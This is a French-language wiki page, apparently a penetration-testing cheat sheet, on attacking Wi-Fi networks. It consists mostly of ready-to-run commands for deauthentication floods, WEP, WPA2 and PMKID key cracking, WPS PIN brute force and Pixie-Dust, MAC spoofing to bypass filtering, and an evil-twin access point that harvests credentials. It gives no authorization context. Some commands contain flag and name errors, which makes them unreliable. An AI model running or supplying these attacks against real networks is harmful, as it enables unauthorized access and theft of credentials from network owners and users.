📡Wifi

Techniques d'exploitation des réseaux wifi

Outils

Wacker

Wacker est un outil d'attaque par dictionnaire pour les réseaux wifi WPA3.

ressource: https://github.com/blunderbuss-wctf/wacker

Aircrack-ng

Aircrack - ng est une suite complète d'outils pour évaluer la sécurité du réseau WiFi.

ressource: https://www.aircrack-ng.org/

Wifite2

Wifite est un outil pour auditer les réseaux sans fil cryptés WEP ou WPA. Il utilise les outils aircrack-ng, pyrit, reaver, tshark pour effectuer l'audit.

ressource: https://www.kali.org/tools/wifite/

EAPHammer

EAPHammer est une boîte à outils pour effectuer des attaques ciblées de type evil twin contre les réseaux WPA2-Enterprise.

ressource: https://github.com/s0lst1c3/eaphammer

Airgeddon

Airgeddon est un outils multi-tâche permettant d'auditer les réseaux sans fil. parmis ces fonctionnalités on retrouve par exemple les attaques de types evil twin, brute force, attaques Pixie dust, deauth, sniffer etc.

ressource: https://github.com/v1s1t0r1sh3r3/airgeddon

Wifiphisher

Wifiphisher est un outil spécialisé dans l'ingénierie sociale, il est capable de mener des attaques de type evil twin, known beacon ainsi que KARMA

ressource: https://github.com/wifiphisher/wifiphisher

Wifipumkin3

Wifipunkin3 est un framework puissant permettant de mener des attaques de point d'accès malveillant.

ressource: https://github.com/P0cL4bs/wifipumpkin3

Macchanger

Macchanger permet de changer l'adresse MAC d'une carte réseau par exemple dans le but de bypass un filtrage par MAC.

Exemple: $ macchanger -m B0:D0:9C:5C:EF:86 wlan0

ressource: https://www.kali.org/tools/macchanger/

Monitoring, Recon et Dumping

# Avec aircrack-ng
# activer le mode monitor
sudo airmon-ng start wlan0mon

# Simple ecoute passive
# Pour trouver des points d'accès
sudo airodump-ng wlan0mon

# Ecoute ciblée avec le bssid voulu
# Ciblé sur une cible et un channel
sudo airodump-ng wlan0mon --bssid xx:xx:xx:xx:xx:xx –c 1 –w outfile

Crack WEP

# WEP est un ancien protocole de cryptage mais encore utilisé dans certains endroits
# Il est possible de le cracker directement

# La seule exigence est d'obtenir suffisamment d'IV
# Le processus peut être amélioré en envoyant des paquets deauth
# -0 == attaque detauth, envoi de 3 paquets (peut être augmenté)
aireplay-ng -0 3 -a <TARGET_AP_MAC> wlan0mon -w 

# Une autre possibilité est d'utiliser une fausse authentification
# -1 = fausse authentification
# 0 = délai entre les demandes d'association
# -e = AP ESSID (nom)
# -a = AP MAC
# -h = MAC attaquant
aireplay-ng -1 0 -e test -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 wlan0mon

# On peut aussi passer par le sniffing et injection ARP 
aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 wlan0mon

# On peut ensuite simplement cracker la clè comme ceci
aircrack-ng outfile -w wordlist

Crack WPA2 PSK / PMKID

# Vous pouvez d'abord vous concentrer sur un AP en utilisant airodump-ng (voir la section de monitoring)
# Ici, vous voulez obtenir le handshake WPA
# Il nécessite un trafic réseau entre le point d'accès et un appareil

#Dumping
sudo airodump-ng wlan0mon --bssid xx:xx:xx:xx:xx:xx –c 1 –w outfile

# Désactivez les appareils connectés pour lancer le processus d'authentification et essayez d'obtenir le handshake
aireplay-ng --deauth 15 -a <TARGET_AP_MAC> wlan0mon
aireplay-ng -0 15 -a <TARGET_AP_MAC> wlan0mon

#On peut ensuite tenter de cracker la clè
aircrack-ng outfile -w wordlist

PMKID

# Vous n'avez pas besoin de trafic réseau pour cette attaque
# Utilisation de hcxtools et hcxdumptool

# D'abord il faut activer le mode monitor
sudo airmon-ng start wlan0mon

# capturer le PMKID
# La capture du PKMID peut prendre un certain temps (plusieurs minutes)
# Si un point d'accès reçoit notre paquet de demande d'association et prend en charge l'envoi
sudo hcxdumptool -i wlan0mon -o outfile.pcapng --enable_status=1

# Ensuite, convertissez les données capturées dans un format approprié pour hashcat
# -E récupérer les mots de passe possibles du trafic WiFi (en plus, cette liste inclura les ESSID)
# -I récupère les identités du trafic WiFi
# -U récupère les noms d'utilisateur du trafic WiFi
sudo hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng

#Enfin on utilise hashcat pour cracker le resultat
hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

Crack WPS

# Reaver Attack
# Bruteforcing en ligne du code PIN WPS à 8 chiffres
# Un peu vieux et peut être obsolète de nos jours, mais toujours utilisable

# Outil de dumping intégré Reaver (airodump-ng peut également être utilisé))
# Wash donne des informations sur le WPS verrouillé ou non
# Les WPS verrouillés auront moins de chances de succès
wash -i wlan0mon

reaver -i wlan0mon -c 6 -b 00:23:69:48:33:95 -vv

# Certains constructeurs ont mis en place des protections
# Vous pouvez essayer différents commutateurs pour les contourner
# -L = Ignorer l'état verrouillé
# -N = Ne pas envoyer de paquets NACK lorsque des erreurs sont détectées
# -d = délai de X secondes entre les tentatives de code PIN
# -T = définir le délai d'attente sur X seconde (.5 signifie une demi-seconde)
# -r = Après X tentatives, veille pendant Y secondes
reaver -i mon0 -c 6 -b 00:23:69:48:33:95  -vv -L -N -d 15 -T .5 -r 3:15

# Pixie-Dust attack
# Fait avec Reaver + PixieWPS
# Cette attaque est basée sur seed / false random

# lancer reaver, nous avons besoin du PKE, PKR, e-hash 1 & e-hash 2, E-nonce / R-nonce
# et la clé d'authentification de Reaver à utiliser pour pixiewps
reaver -i wlan0mon -c 6 -b 00:23:69:48:33:95 -vv -S

# Maintenant, en utilisant pixiexps, vous pouvez déchiffrer le code PIN hors ligne
pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>

# Enfin, vous pouvez utiliser le code PIN avec Reaver pour accéder au mot de passe en clair
reaver -i <monitor interface> -b <bssid> -c <channel>  -p <PIN>

Rogue AP attack

Evil Twin

# Démarrer le mode monitoring
# Si vous prévoyez d'utiliser une attaque deauth, connectez les 2 interfaces eth en même temps
# Pour éviter d'avoir wlan0mon et wlan0 (cela peut entrer en conflit)
sudo airmon-ng start wlan0

# Si des processus bloquent le mode monitoring, kill
sudo airmon-ng check kill
sudo kill <PID>

# Obtenir l'AP cible (ESSID)
# Votre cible peut avoir plusieurs AP, et donc plusieurs adresses MAC
# Ils peuvent fonctionner sur différents canaux
sudo airodump wlan0mon


# Définissez ensuite la cible dans le fichier de configuration
sudo nano /etc/hostapd-wpe/hostapd-wpe.conf
ssid=<ESSID>


# Démarrez le point d'accès
# Vous n'obtiendrez que les personnes qui se connectent récemment à l'AP cible
# Si vous voulez que les gens soient déjà connectés, vous devez pousser l'attaque plus loin avec le deauth
sudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf

# démarrer la deuxième interface ethernet
sudo airmon-ng start wlan1

# Deauth (Dans un autre terminal)
# Basé sur les différents ESSID et canaux trouvés à l'étape 3
# -0 est le nombre de paquets deauth envoyés
sudo aireplay-ng -0 10 -a <mac address> -c <channel>

# Maintenant vous n'avez plus qu'à attendre des identifiants
# Vous obtiendrez probablement des hachages NetNTLMv1 que vous devrez cracker

Trouver un SSID caché

Reconnaissance

$ airodump-ng wlan0mon

Sniffing avec airodump

$ airodump-ng -c <canal> --bssid <BSSID> <interface>

Sniffing avec Wireshark

Mettre Wireshark en mode promiscuité, selectionner l'interface WLAN et attendre la connexion d'un client

Bruteforce Avec mdk3

$ mdk3 <interface> p -bl -c <canal> -t <MAC/BSSID>

Wardriving

Le wardriving consiste à balayer des réseaux sans fil à l'aide d'un ordinateur, d'un PDA ou d'un smartphone en utilisant une automobile comme moyen de transport dans le but de trouver des réseaux non-sécurisés et de les exploiter.

Outils

Kismet

Kismet est un sniffer open source, WIDS, wardriver et outil de capture de paquets pour Wi-Fi, Bluetooth, BTLE, thermomètres sans fil, avions, wattmètres, Zigbee, etc.

ressource: https://www.kismetwireless.net/

Netstumbler / Minidump

Equivalent non open source pour WIndows.

PrécédentProtocoles réseau SuivantBLE

Mis à jour il y a 1 an

Ce contenu vous a-t-il été utile ?